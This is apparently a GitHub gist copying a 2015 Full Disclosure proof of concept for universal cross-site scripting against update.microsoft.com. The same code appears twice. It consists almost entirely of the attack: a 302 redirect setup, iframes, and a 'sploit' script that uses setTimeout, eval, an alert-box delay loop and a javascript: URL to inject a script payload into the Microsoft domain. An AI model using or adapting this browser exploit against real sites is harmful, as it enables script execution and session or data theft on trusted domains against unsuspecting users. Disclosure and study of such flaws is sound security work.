/gist:f0b1481f0ae5424454f3 Secret

## gistfile1.txt
// From http://seclists.org/fulldisclosure/2015/Feb/0

// Sample: UXSS against https://update.microsoft.com

// Make the URI /1 on your server respond with the HTTP redirect:
< HTTP/1.1 302 Found
< Content-Type: text/html;charset=utf-8
< Location: https://update.microsoft.com/asdadasd

// XSS into https://update.microsoft.com
<iframe id=i name=i src="/1"></iframe><br>
<iframe src="https://update.microsoft.com/asdadasd" onload='sploit()'></iframe><br>
<script>
function sploit(){
	var payload = 'alert(location.href);'
	frames[0].setTimeout("alert(eval('x=top.frames[1];d=new Date;while((new Date)-d<3000)alert(\\'An error occurred.\\');x.location=\\'javascript:%22%3Cscript%3E"+encodeURIComponent(payload)+"%3C/script%3E%22\\';'))",1);
}
</script>
	// From http://seclists.org/fulldisclosure/2015/Feb/0

	// Sample: UXSS against https://update.microsoft.com

	// Make the URI /1 on your server respond with the HTTP redirect:
	< HTTP/1.1 302 Found
	< Content-Type: text/html;charset=utf-8
	< Location: https://update.microsoft.com/asdadasd

	// XSS into https://update.microsoft.com
	<iframe id=i name=i src="/1"></iframe><br>
	<iframe src="https://update.microsoft.com/asdadasd" onload='sploit()'></iframe><br>
	<script>
	function sploit(){
	var payload = 'alert(location.href);'
	frames[0].setTimeout("alert(eval('x=top.frames[1];d=new Date;while((new Date)-d<3000)alert(\\'An error occurred.\\');x.location=\\'javascript:%22%3Cscript%3E"+encodeURIComponent(payload)+"%3C/script%3E%22\\';'))",1);
	}
	</script>